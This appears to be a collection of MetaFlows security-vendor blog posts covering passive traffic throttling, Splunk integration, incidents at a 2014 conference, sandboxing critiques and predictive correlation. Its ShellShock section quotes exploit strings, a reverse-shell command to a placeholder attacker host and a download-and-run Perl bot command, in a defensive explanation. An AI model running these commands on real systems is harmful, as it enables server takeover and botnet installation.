Throttle in Passive Mode

throttling in passive mode!?!?Sometimes users can knowingly, or unknowingly, abuse a network by using a lot of bandwidth. With the proliferation of video on demand services such as Netflix, Hulu, and Amazon Prime, some institutions are once again finding themselves battling bandwidth issues.

Until now, one needed an in-line device, such as a firewall, to throttle traffic by allocating certain bandwidth to certain flows or applications. Any in-line device also adds latency and reduces reliability, especially on high speed links. Wouldn’t it be nice to throttle specific traffic in a way that does not impact performance of the traffic you do care about? This has been an age-old conundrum for network engineers.

Well, continuing on our hot streak of innovations, MetaFlows recently developed (in collaboration with one of our university customers) an unprecedented technique to throttle traffic in passive mode! It works a bit like active response, where spoofed packets are injected into the traffic stream to shut down flows. In this case, we are not shutting down flows, we are forcing them to slow down.

The result is that you can identify any TCP flow using one or more of our 20,000 signatures (appID is coming very soon), and limit its bandwidth. This means you can have zero impact on performance and reliability of your production traffic while you can achieve very fine grain control of the traffic you do not care about!

MetaFlows: SC Magazine Innovators Hall of Fame

sc_logo_21413_345884Our friends at SC Magazine have inducted us into the SC Magazine Innovators Hall of Fame. It is nice to be recognized for our innovations. Importantly, this is purely based on their journalistic curiosity; we give them props for performing their reviews based on sound technical knowledge. We refuse to pay money for recognition. You might think we are old-fashioned but this is how we roll at MetaFlows.hall_of_fame_495827

Their article also points out the importance of monitoring beyond the network perimeter using multi-session correlation. If you are not sure what multi-session correlation can do for you, it is best for you to put it to the test. You will be amazed of what you can find out about your network.

Read the article at SC Magazine’s Website

Get Packet Payloads with Splunk

It is fairly easy to create a workflow action to access the MetaFlows File-Carving and PCAP extraction interface.

Step 1: Extract the flow information from the MetaFlows event feed.

If you already use CEF log output from MetaFlows, or if you want to change to it, then the required fields should already be extracted:
src, dst, spt, dpt, start

Or, if you are using the standard syslog output then you will need something similar to the following extraction regex to make sure each record has those fields:

Additionally, you will need to append “|eval start=_time” to your queries in order to get the start field unless you already have a derived field which gives you a unix timestamp to use in the query.

Or, if you have your own parsing in place that uses different field names which correspond to ‘Source IP, Destination IP, Source Port, Destination Port, Timestamp‘ then you may need to adjust the field names in the URI under step 2 to match. You will still need to make sure that you can provide a unix timestamp field.

Step 2: Create a workflow action.

Go to settings->FIelds->Workflow actions->Newand set the following fields:
Label: Extract PCAP / Carve Files $src$ $dst$ $start$
Show action in: Both
Action Type: Link
URI:$src$&dsta=$dst$&srcp=$spt$&dstp=$dpt$&st=$start$&sensor_sid=<your sensor’s SID>
Open link in: New Window
Link method: Get

Your sensor’s SID should be a hash listed on the view sensors page, or in the file /nsm/etc/UUID on the sensor itself.

Step 3: Test the Setup.

Test by selecting Extract PCAP / Carve Files from the Event Actions menu for any event in a search. You need to be logged into MetaFlows for this to work. It should take you straight to the File Carving interface which will provide a link to the PCAP data as well.

Note that if you have ‘Log All Packets‘ enabled, you will most likely see the PCAP slice as well as all the files that where downloaded/uploaded in that flow or set of flows. If you do not have ‘Log All Packets‘ enabled, you will only see the PCAP slice corresponding to the packets logged by the IDS system.

What We Caught at Supercomputing 2014

  1. Scanners (DNS, MYSQL, SSH, Shodan Indexing, portmap)
    DNS and MYSQL scanning from China, SSH brute force from everywhere, Shodan vulnerability indexing, and one very persistent portmap scanner.
  2. Lots of BitTorrent users kicked off the wireless network for illegal file sharing.
    In previous years torrent users have been mostly ignored since there were no good ways to determine which uses of the torrent software were legitimate and which were not. This year, however, these were not hard to find at all. MetaFlows software automatically decodes the torrent and magnet information to determine exactly which files a user is trying to download as well as which files they are seeding to other users. At first we were very picky about only disabling heavy abusers seeding outbound shares of recent movies and current TV shows. As the conference went on we got a bit more aggressive at reporting on and banning downloaders as well. When the user was not on the wireless, they were sometimes a little hard to pin down:

    “…it was from someone who gave a talk for them and plugged into their network. This person will not be presenting again, so they expect we will not see this activity again. Please let them know if we do.

  3. Spyware on the show floor.
    We saw the return of some MarketScore spyware that we had seen at the Denver conference in 2013. Unfortunately we could not always track down adware/spyware cases on the show floor or the wireless since they were a lower priority.
    snort-policy-violation/malware:1.2001564:ET MALWARE Spyware Proxied Traffic
  4. Inbound telnet scanning and the default IPMI port
    A couple of cases of telnet port 23 being accessible by the outside world were discovered before they could be exploited. One of them appeared to be an IPMI port that someone had accidentally plugged in; it was still configured to the default admin/admin password.

    “We chatted with the two booths that have these machines. The one with the admin/admin account has disconnected that interface. The second booth has disabled telnet. Both booths were very happy that we let them know. Thanks!”

  5. Linux Trojans – default/weak passwords led to boxes being added to a DDoS botnet.
    snort-trojan-activity/trojan:1.2018808:ET TROJAN DoS.Linux/Elknot.G Checkin

    Unfortunately the first of these that we reported was left unresolved and its status as a bot was confirmed when it began sending SYN flood attacks overnight. The host did get attended to the next day, and future cases of this infection were taken much more seriously. Once we got the behavior pattern down we found that the infected host downloads a binary payload from a command and control server.

    After adding the binary source to the blackhole list these infections stopped. Generally the cases that remained were resolved by talking to the user and letting them take care of it:

    “The technical guy said that that IP was just a VM and he will shut it down. We are no longer seeing traffic.”

    “I chatted with the guy in booth WXYZ and he is in the process of cleaning up his Linux box. He was thankful for the information, and commented that he had the default username and password for root on the Linux box.”

  6. Suspicious signs of WireLurker on OS X systems.
    We want to research these a bit more, it looked like there were maybe three OS X machines on the network that were triggering alerts to this “evil” domain.

    snort-trojan-activity/trojan:1.2019667:ET TROJAN OSX/WireLurker DNS Query Domain

    This alert was sometimes also seen with weird DNS alerts:

    snort-policy-violation/dns:1.2014703:ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set - Likely Kazy
  7. Large scale SIP Scanning.
    There was a massive DDoS style scan of the network on port 5060 on the second day of the conference, and we suspect it may have contributed to some infrastructure issues and recommended temporarily blocking off that inbound port at the border if there were no known legitimate services running for it. Hundreds of external scanners to thousands of internal hosts? This one stood out to us right away.

ShellShock Analysis

How ShellShock Works

ShellShock exploits a vulnerability in Bash. It allows unauthorized users to send commands to your Linux web servers. For example:

{ :;}; /bin/bash -c <command>


env X='() { (.+)=>\' bash -c "<filename> <command>"

<filename> and <command> can be anything. <command> will execute and the output will be in <filename>. .+ means one or more characters (like “a”, “b”, “cc”, “ddd”, “abcd”, etc.). The second form is a bit more tricky to use remotely, but I would not ignore the vulnerability.

Some examples of things that are being executed as we speak are:
wget 'https://<bad_server>/s.php?s=https://<your domain>/'
/bin/ping -c 1 <command_and_control>

These examples tell the hackers if a server is open to the exploit. However, remember: <command> can be anything. Attackers can remove files, modify your web site, copy any file from your web server, or execute database commands to steal all your secrets!

An example of a particularly bad <command> is:

/bin/bash -c 'bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1'

This gives attackers a shell to your web server. Anything they execute on <bad_ip> will be executed on your server. In one particular case, they installed a Perl bot with the following command:

wget -O /tmp/.lCE-unix https://<compromised_ip>/icons/xt.dat;perl /tmp/.lCE-unix <irc_channel>;rm -rf /tmp/.lCE-unix;uptime

This installs a Perl bot that takes commands from a command and control center and executes them on your server.

MetaFlows’ Response Highlights the Need for Multi-Session Analysis

We immediately deployed IDS rules published by our friends at SourceFire and Emerging Threats as soon as they came out. These rules detect the exploit itself but they will be triggered a lot because attackers are aggressively scanning web servers for vulnerabilities as we speak. This is where multi-session analysis comes into play. MetaFlows can tell you which servers being scanned are actually exploited! We have now published Correlation Engine Rules (a capability unique to the MetaFlows Security System) that not only tell you if there is an attempt to subvert your web servers, but also whether any of your servers were compromised.

MetaFlows Correlation Engine Rules work as follows:

  1. Detect an attempt to execute the ShellShock exploit on internal address A .
  2. Shortly thereafter, detect if there is a subsequent outbound flow (ICMP or TCP) from A to an external IP address.

If you are interested in deploying MetaFlows’ multi-session analysis with our Correlation Engine Rules, let us know at and we will be glad to help you get started.

Cloud-Based Sandboxing

Cloud-based Sandboxing refers to the ability of network security devices such as firewalls to:

  1. Query a database to see if some content traversing the network exhibits a known signature.
  2. Upload unknown suspicious content up to the sand-boxing cloud to see if it misbehaves.

The devil is in the detail..

How frequently is the cloud updated?devil-details

Most vendors do not like to share; they all create their own repository of signatures. If you want evidence on how purely this works submit a bad piece of Malware to Virus Total. You would be lucky to see more than 3 or 4 out of 54 vendors having a pre-existing signature. So, when a vendor tries to sell you their cloud-based sandbox for top dollars ask yourself: “Do I really want to pay for 1/54 of what I could get if a signed up with a signature sharing service such as Virus Total?”. I would not..

Is this really a Sandbox or more like an autopsy?



Some vendors will try to sell you a Cloud-based sandbox for $1000s/year; but if you read the fine print, it will actually say that the processing time is 2 hours or more. This means that if you received an unknown email attachment, you would not know what to do with it for 2 hour or more. Some sand-boxing services are better and would give you an answer within minutes. So be careful what you sign up for..

How is MetaFlows Better?

For starters,we use Virus Total, so when checking for a content signature, you are using ALL Antivirus systems at once;

all 54 not 1.

Why would you rely on one vendor’s database?



Recently, we started our own cloud-based, sand-boxing service. The rationale is that it complements the signature checking system when something is brand new and nobody in the world has seen it before (not even Virus Total!). A best-effort sand-boxing service comes standard with our appliances. Typically the sand-box can execute a sample anywhere from 90 seconds to 10 minutes or so (not 2 hours!). Our customers do not pay for this, because we feed this information back into the community though Virus Total. If we find a new bad email attachment, we notify our customer and block it; but we also help the community by letting the rest of the world know about it (we like sharing).

A paid service guarantees execution within 120 seconds and an on-site, sand-boxing appliance can reduce the time even further to approximately 30-60 seconds. When you pay for these services, we let you decide if you want to share or not; we hope you will share; but it is up to you.

What’s Wrong with NG Firewalls?

Cut Your Cisco Network Hardware CostsNext generation (NG) firewalls allow administrators to efficiently restrict network use policies to prevent infections. These firewalls (Palo Alto Networks is the most notable example) secure your enterprise by blocking everything that is not explicitly allowed by your network administrator. It clamps down on anything unknown: unknown users, unknown applications, unknown ports, etc. NG firewalls also provide some traditional IPS features that can be used to shape traffic coming into the network.v



So what is wrong with locking everything down as a primary defense mechanism? This approach has 2 major drawbacks.

Problem 1: It’s Not Scalable

complaintNG firewalls are basically a heuristics-based approach to security. Some networks and some operators might be a good fit for this, but many are not. This approach works in small, simple networks where the operator is omnipotent and has complete visibility on the network use policies. Unfortunately, most networks are not simple and most operators are not omnipotent.

As new uses for networks evolve and new applications are used, these heuristics need to be constantly updated and evolved as well. After a few months of complaining from their users, operators will start relaxing the policies and therefore leave the network as exposed as it once was with a traditional firewall.


Problem 2: It’s Can’t Actually Stop Active Intrusions

DamOnce something bad makes it inside the network, NG firewalls are no better than a traditional IDS system. They flood network operators with thousands of alerts which can be used as audit trails, but are otherwise useless for detecting active intrusions. This poses a significant risk: most data breaches today happen through legitimate network channels (browser drive-by, spear-phishing, social engineering, etc.). Think about your house: you can put bars on the windows, but if your teenager invites a thief inside the house, the bars and the locks are useless.



Don’t Put All Your Eggs In One Basket

eggsThere is a saying in security: “Hard on the outside and soft and chewy on the inside.” If you are serious about security, you need to lock the gate. But you also need a way to look for anomalies on the inside. That is what MetaFlows does well: we complement your firewall, traditional or next generation. We don’t claim to be able to replace everything in one magical box like most of our competitors, and you shouldn’t put all of your eggs in one basket. Your firewall should do what it does best: lock your door. But firewalls must also be complemented by a security solution that can actively detect and respond to network intrusions. 20 years of cyber-security research helped us to create a product that detects threats, no matter how they got in. Try Metaflows today to see what your firewall is missing!

Connecting the Dots

3d network connections isolated in white backgroundOne of the most important lessons from cyber-war fighters is that relying on a single mechanism to defend your enterprise is naive. In fact, the more disparate and heterogeneous the network defense mechanisms, the better. MetaFlows fully embraces this concept by providing several detection mechanisms that work together:

  • IDS behavioral analysis looking for multiple symptoms that indicate a compromised host.
  • Using up to 50 different antivirus solutions at once to find bad content on the network.
  • Honeypots continuously mining for new threats.
  • Flow and log analysis.

These are just a few things that MetaFlows does.

Until now, MetaFlows has used these mechanisms independently to find and defeat threats. Our multifunctional approach has proven to be very effective. Many customers characterize the MetaFlows Security System as “The Last Line of Defense”. But now, we just upped the ante!

Leveraging our multifunctional view, we now also support behavioral correlation to combine disparate intelligence sources. Our Correlation Engine Rule (CER) specification now allows you to connect the dots across the different functional paradigms. But enough smoke and mirrors! Here are some REAL examples.

Data Exfiltration

  1. Detect the external hosts that are scanning your network.
  2. If any of these hosts exchange more than a few thousand packets with an internal host, flag the internal host as compromised.

Notice that (1) is an IDS function while (2) is a flow analysis function.

Zero-day Infection of Something That Cannot Be Executed in a Sandbox

  1. Host A downloads a bad .exe from server B .
  2. Host C (an Apple computer) downloads a JAR file from server B .
  3. Host C is talking to a known Command & Control site.

(1) is detected by a virus scanning application, (2) is detected with L7 analysis, (3) is detected by an IDS rule.

These examples demonstrate why traditional defenses are inadequate. Correlated together, these rules give you a powerful view of exactly what is happening on your network. You really need a multifunctional system that can connect the dots.

What’s Wrong with Sandboxing?

How Sand-Boxing Works

The latest and hottest trend in cyber-security is sand-boxing. Sand-boxing is virus detection on steroids. Instead of relying on prior knowledge about particular viruses, this technique emulates a user’s workstation with a sandbox and tracks anything that attempts to go out of the box or attempts to infect other machines. The process is straightforward:

  1. Get all potentially infectious content coming into your organization, and
  2. Emulate each piece of content as if it was executing on your hosts.

Limitations of Sand-Boxing

Sand-boxing has low false positive rates, but causes a lot of false negatives. In other words, when it tells you that something is bad, it is almost certainly bad. But it has the potential to miss a lot of bad things.

Architectural Limitations

PerimeterThis limitation has to do with step 1 above (get all dangerous content coming into your organization). Your defense perimeter is dissolving because of new network trends and applications:

  1. Mobile devices continuously come into and go out from your network.
  2. Peer-to-peer protocols (which go right through sand-boxing and firewall appliances) are becoming mainstream (skype, bittorrent, b2b applications).
  3. Services are being pushed to the cloud, out of the grasp of your sandbox.
  4. Virtual machines move around at the speed of light from one host to another.
  5. IPv6 and other emerging trends are facilitating end-to-end encrypted tunneling right through your perimeter.

So, if you do not have a perimeter, how do you know what is coming in? Well, you don’t! That is why sand-boxing (or pure virus detection) is limited in scope and cannot survive the evolution of malware.

Another architectural limitation has to do with cost. If you run a large network, executing and/or opening every piece of content before it is delivered requires a lot of CPU and will slow down your network. Sand-boxing can only scale to a certain size; beyond that it becomes unrealistic and expensive.

Algorithmic Limitations

EvasionThis limitation has to do with step 2 above (emulate each piece of content as if it was executing on your hosts). Evasion is an information security term that refers to the ability of the bad guys to:

  1. Know how you are detecting them and
  2. Add subterfuges to defeat your specific security measures.

A sandbox can be detected. Once malware realizes that it is in a sandbox, the malware will switch to its best behavior so that the sandbox is happy. Only when the malware gets out of the sandbox and on to the the actual target device will it do its damage.

A second algorithmic limitation is that not every system is the same. Sandboxing a particular version of Microsoft (which is what commercial sandbox solutions do) leaves all you other devices (Linux, Apple, Android, etc.) completely open to attack.

How is MetaFlows Better?

MetaFlows is not an antivirus. We detect the attempts to introduce a virus in your network AND/OR detect the presence of a virus. Think of it as a network-level sandbox that not only inspects individual pieces of content, but also keeps track of the behavior of all your devices over time. There is one thing a malicious host cannot evade: being malicious!

If it looks like a duck, swims like a duck, and quacks like a duck… it is a duck.

How does it work?

MetaFlows looks for classes of odd behavior from hosts on your network:

  1. Scanning behavior
  2. Being attacked on vulnerable ports
  3. Downloading dangerous content
  4. Communication with questionable sites or sites that are already known to be bad
  5. Scanning outward or doing a lot of DNS lookups

If we detect behavior from multiple event classes over a time period (ranging from minutes to hours), MetaFlows triggers an alert.

Here is simple example:

  1. External host B performs a brute force attack to guess your password on port 22 on server A .
  2. One hour later there there is a large transfer of data from server B to another server C (on your network).

Bang! That’s a hit for us. But a sandbox has no clue! By itself, a sandbox would not detect this behavior. The malware could “play nice” once it realizes that it is in a sandbox. The sandbox would then allow the malware to leave and get inside your network, where it could do substantial damage. But MetaFlows can keep an eye on software even after it leaves the sandbox.

biohazard-laptopThe main advantage of a network level sand-box is that it does NOT solely rely on inspecting content (like an antivirus) but instead detects malware in the act of being bad. So, if someone walks in through your front gate with an infected laptop, as soon as that laptop misbehaves, it will be flagged down.


The best part is that MetaFlows works regardless of what devices are on your network – it solves the algorithmic limitations of sandboxes. Our behavioral event classes do not depend on the type of system: if an internal host is performing outbound scanning, we do not care if it is a Microsoft device or an Apple device. All we need to know is that it has engaged in malicious behavior.


networkcableFinally, our approach is much more scalable than a content sandbox. MetaFlows mitigates the architectural limitations of sandboxes by scaling to 10 Gbps links with standard off-the-self quad-CPU systems. The cost and power consumption are orders of magnitude lower.

Predictive Correlation — The Future of Cyber Security?

What is Predictive Correlation?

Research funded by the National Science Foundation has led to the development of a proprietary inter-domain correlation algorithm that is mathematically similar to Google’s Page Rank algorithm. Event scores are autonomously obtained from a global network of honeypot sensors monitored by the MetaFlows Security System (MSS). The honeypots are virtual machines that masquerade as victims. They open up dangerous ports/applications and/or browse dangerous websites. As the honeypots are repeatedly infected, the MSS records both successful and unsuccessful hacker URLs, files, bad ports, and bad services. When a honeypot has a security event that triggers a false positive, the alerts for those events are ranked negatively, thus providing insight into events that should be routinely ignored or turned off. Security events that trigger true positives are ranked positively, thus improving their visibility. This information is then propagated in real time to each of our subscribers’ sensors in the system to augment traditional correlation techniques. This additional inter-domain correlation is important because it adds operational awareness based on real-time intelligence.

How does it work?

As shown in the figure below, honeypots work behind the scenes, continuously mining global relevance data and flow intelligence (IP reputation) for threats that penetrate differing degrees of cyber-defenses on different types of systems. After this step, annotated data from all network sensors (whether the sensors are honeypots or not) are compared and events are correlated with an algorithm similar to Google’s Page Rank algorithm: (X = bs + aW*X) .

Diagram of MetaFlows event correlation system
Figure 1: Predictive Global Correlation

This process is designed to provide subscribers with intelligence data that takes into account the similarities and differences between the sources of the data. For space limitations we cannot explain the math and why it makes sense; however our system builds on the work described in “Highly Predictive Blacklisting” by Jian Zhang, Phillip Porras, Johannes Ullrich, SRI International and the SANS Institute in Usenix Security, August 2008 (we highly recommend that you read this article).

So What?

As a result of the algorithm, once a piece of intelligence reaches our system it is not equally distributed to all customers. Instead, it is mathematically weighted and routed to where it is most relevant, just as the first few web pages of a Google search yield the most relevant information for a particular search.

In addition to real-time intelligence on true positive security events (positive ranking), our system also provides information on security alerts that are irrelevant by demoting them and reducing false positive clutter. In other words, this system can propagate known false positives and known true positives among sensors using a mathematical model that maximizes prediction.

Graph of prediction power for MetaFlows ranking algorithm

The graph above quantifies the prediction power of the ranking algorithm. The experiment was carried out on the Snort event relevance data gathered between February 7th, 2010 and February 22nd, 2010. At the start of each day we performed the ranking operation over the previous day’s Snort event data and compared the predicted ranking values with the actual events gathered during that day from the sensors and honeypots. The simple prediction (blue line) is based on predicting that, for each sensor, the same event ranking is carried over from the previous day without running the algorithm (this is what people normally do today).

The Y axis is the hit ratio. The “hit ratio” is defined as the number of times the prediction matches the outcome in terms of the sign (positive or negative), divided by the number of non-zero rankings predicted.

  • We increment the hit counter if the prediction and the outcome have both positive rankings.
  • We increment the hit counter if the prediction and the outcome have both negative rankings.
  • We decrement the hit counter if the prediction and the outcome have opposite signs.

The figure shows that the ranking prediction (orange line) is strictly superior to simple prediction by 141% to 350% (depending on the day). This might not seem too impressive on the surface but if you dig a little deeper this is what it means:

  • Assuming 5 minutes of human analysis time per incident, a system with no ranking would give you a hit rate that finds 1 actionable item for every 20-30 incident investigations (or 0.4 incidents per analyst hour).
  • A system with predictive ranking would let you find 1 actionable item every 6-7 incidents investigations (2 incidents per analyst hour).

You can do the math in terms of cost savings: it’s huge! Most of the cost of network security systems is not the appliance or the software, but rather wasted analyst time!

You Should Not Just Take our Word for it!

The cyber-security arena is packed with technologies that claim they have the best solutions. That is why we encourage users to take the time to evaluate our predictive correlation and run it side-by-side with existing solutions. The outcome is always surprisingly good.